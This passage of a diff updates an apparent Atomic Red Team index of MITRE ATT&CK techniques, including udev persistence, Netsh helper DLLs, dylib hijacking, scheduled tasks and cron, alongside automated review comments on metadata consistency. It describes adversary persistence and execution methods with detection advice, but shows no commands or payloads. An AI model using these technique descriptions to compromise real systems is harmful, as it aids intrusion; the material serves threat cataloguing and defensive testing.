+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1546.007:
technique:
x_mitre_platforms:
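Review bot: the new T1546.017 entry closes with `atomic_tests: []` but has no `identifier: T1546.017` line, whereas the T1055.001 entry just above closes with `identifier: T1055.001` followed by `atomic_tests: []` (other objects in this diff, such as T1055.008 and T1484, also lack it), so the generator is inconsistent about emitting `identifier`; pick one behaviour and apply it everywhere. Two smaller points in the upstream text: `x_mitre_detection` wraps the first two rule directories in backticks but not `/usr/lib/udev/rules.d/`, and the quoted scalar ends with a trailing space before the closing quote. The double quotes around `"@grahamhelton3"` are required, since a YAML plain scalar cannot begin with `@`.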
@@ -27022,7 +27343,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -27046,12 +27367,11 @@ privilege-escalation:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -27135,11 +27455,10 @@ privilege-escalation:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -27191,9 +27510,8 @@ privilege-escalation:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account with admin privileges - MacOS
@@ -27300,7 +27618,7 @@ privilege-escalation:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -27338,30 +27656,29 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
execution:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
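Review bot: T1574.012 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` at the top of this hunk with no replacement, so it joins the objects that now have no attack spec version at all, while T1053.005 below keeps `x_mitre_attack_spec_version: 3.2.0`. In T1053.005's rewritten description the new `(Citation: Stack Overflow)` and `(Citation: Red Canary - Atomic Red Team)` keys need matching `source_name` entries, which this diff adds later under the object's `external_references`. The paragraph on the deprecated `at` utility and `at.exe` not seeing `schtasks` tasks is dropped here; that material lives under T1053.002, so nothing is lost.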
@@ -27408,7 +27725,7 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -27440,8 +27757,8 @@ execution:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27455,6 +27772,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
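Review bot: the new `Red Canary - Atomic Red Team` reference points at `atomics/T1053.005/T1053.005.md` on this repository's `master` branch, so the index now cites the project that generates it, and at a moving ref rather than a tagged commit. It is upstream ATT&CK's reference and should be reproduced verbatim, but renaming or moving that file will break a citation that upstream owns, which is worth keeping in mind before any restructuring of the `atomics` tree.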
@@ -27467,16 +27788,19 @@ execution:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1047:
technique:
- modified: '2024-04-11T18:13:25.130Z'
+ modified: '2024-10-15T15:20:57.328Z'
name: Windows Management Instrumentation
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -27542,7 +27866,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1047
atomic_tests: []
T1129:
@@ -27619,66 +27942,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1129
atomic_tests: []
T1059.007:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Cody Thomas, SpecterOps
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
- type: attack-pattern
- created: '2020-06-23T19:12:24.924Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1059.007
- url: https://attack.mitre.org/techniques/T1059/007
- - source_name: NodeJS
- url: https://nodejs.org/
- description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
- - source_name: JScrip May 2018
- url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
- description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
- June 23, 2020.
- - source_name: Microsoft JScript 2007
- url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
- description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
- ECMAScript …. Retrieved June 23, 2020.
- - source_name: Microsoft Windows Scripts
- url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
- description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
- June 23, 2020.
- - source_name: Apple About Mac Scripting 2016
- url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
- description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
- 14, 2021.
- - source_name: SpecterOps JXA 2020
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
- 2021.
- - source_name: SentinelOne macOS Red Team
- url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
- APIs Without Building Binaries. Retrieved July 17, 2020.'
- - source_name: Red Canary Silver Sparrow Feb2021
- url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
- description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
- wings: Outing macOS malware before it takes flight. Retrieved April 20,
- 2021.'
- - source_name: MDSec macOS JXA and VSCode
- url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
- description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
- with VSCode Extensions. Retrieved April 20, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-07-30T14:12:52.698Z'
name: 'Command and Scripting Interpreter: JavaScript'
description: |-
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
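Review bot: the removed block here (platforms, domains, object_marking_refs, id, type, created, created_by_ref and the whole external_references list) is re-emitted in the next hunk at the bottom of the same T1059.007 object, so nearly all of this diff is key reordering and the one real change, `modified: '2022-04-25...'` to `'2024-07-30...'`, is buried in it. Emitting keys in a fixed order in the generator would keep regenerations reviewable. Carrying the `JScrip May 2018` source_name over unchanged is correct, since it is an upstream citation key and not a typo to fix here.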
@@ -27691,31 +27959,83 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_contributors:
+ - Cody Thomas, SpecterOps
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through osascript
and usage of OSAScript
API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ created: '2020-06-23T19:12:24.924Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/007
+ external_id: T1059.007
+ - source_name: Apple About Mac Scripting 2016
+ description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+ 14, 2021.
+ url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+ - source_name: MDSec macOS JXA and VSCode
+ description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+ with VSCode Extensions. Retrieved April 20, 2021.
+ url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+ - source_name: Microsoft JScript 2007
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ - source_name: Microsoft Windows Scripts
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ - source_name: JScrip May 2018
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ - source_name: NodeJS
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ url: https://nodejs.org/
+ - source_name: SentinelOne macOS Red Team
+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+ - source_name: SpecterOps JXA 2020
+ description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+ 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: Red Canary Silver Sparrow Feb2021
+ description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+ wings: Outing macOS malware before it takes flight. Retrieved April 20,
+ 2021.'
+ url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.007
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
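Review bot: `spec_version: '2.1'` is dropped (the removed `- spec_version: '2.1'` line) while the object is still typed `attack-pattern` with a STIX 2.1 id and `x_mitre_attack_spec_version` moves 2.1.0 to 3.2.0; if anything downstream validates these records as STIX 2.1 objects, spec_version is a required property there, so confirm consumers only read the `x_mitre_*` fields. The same hunk silently drops `x_mitre_permissions_required` (User, Administrator, SYSTEM) for T1059.007 with no replacement; if that is the deprecated-field cleanup that accompanies the 3.2.0 spec, the PR description should say so rather than leaving it to be inferred from the diff.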
@@ -27773,9 +28093,8 @@ execution:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1559.002:
@@ -27867,20 +28186,19 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1559.002
atomic_tests: []
T1204.002:
technique:
- modified: '2023-04-21T12:22:19.740Z'
+ modified: '2024-09-25T20:50:34.876Z'
name: 'User Execution: Malicious File'
description: "An adversary may rely upon a user opening a malicious file in
order to gain execution. Users may be subjected to social engineering to get
them to open a file that will lead to code execution. This user action will
typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
Adversaries may use several types of files that require a user to execute
- them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
- may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+ them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+ .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
to increase the likelihood that a user will open and successfully execute
a malicious file. These methods may include using a familiar naming convention
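Review bot: T1559.002 keeps `x_mitre_attack_spec_version: 3.1.0` (the context line just above the removed `spec_version`) while neighbouring objects are bumped to 3.2.0, and Network Device CLI later in this patch keeps 2.1.0. If the values mirror the upstream objects verbatim the mixture is expected, but if the generator applies the bump it skipped these objects; state which in the PR. The `.reg` addition to the T1204.002 description is a content change and matches the 1.3 to 1.4 version bump in the following hunk.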
@@ -27908,7 +28226,7 @@ execution:
- Linux
- macOS
- Windows
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -27928,33 +28246,13 @@ execution:
url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1204.002
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -27971,6 +28269,7 @@ execution:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -27981,9 +28280,13 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -27991,8 +28294,24 @@ execution:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
@@ -28092,7 +28411,7 @@ execution:
description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
Application COM Object. Retrieved November 21, 2017.
source_name: Enigma MMC20 COM Jan 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-07-26T22:51:20.448Z'
name: Component Object Model
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
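Review bot: the `modified` timestamp for Component Object Model moves backwards, from 2022-04-25 to 2021-07-26, and the same regression occurs for Network Device CLI later in this patch (2022-05-11 to 2022-04-19). A regeneration from current upstream data should not produce an earlier modified date, so this suggests the source bundle for these two objects is older than the one used previously; confirm which ATT&CK release the index was generated from before merging.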
@@ -28117,12 +28436,10 @@ execution:
- 'Script: Script Execution'
- 'Process: Process Creation'
x_mitre_remote_support: true
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
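Review bot: the Component Object Model object loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` with no replacement value visible in this hunk, whereas every other object in this change receives `x_mitre_attack_spec_version: 3.2.0`; check that the field is emitted elsewhere in that object, otherwise the record ends up with no spec version at all.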
@@ -28202,11 +28519,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.002:
technique:
- modified: '2024-03-01T19:06:05.126Z'
+ modified: '2024-10-15T14:18:20.087Z'
name: 'Command and Scripting Interpreter: AppleScript'
description: |-
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -28266,7 +28582,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.002
atomic_tests:
- name: AppleScript
@@ -28287,7 +28602,7 @@ execution:
name: sh
T1106:
technique:
- modified: '2023-10-13T16:01:07.538Z'
+ modified: '2024-09-12T15:25:57.058Z'
name: Native API
description: |-
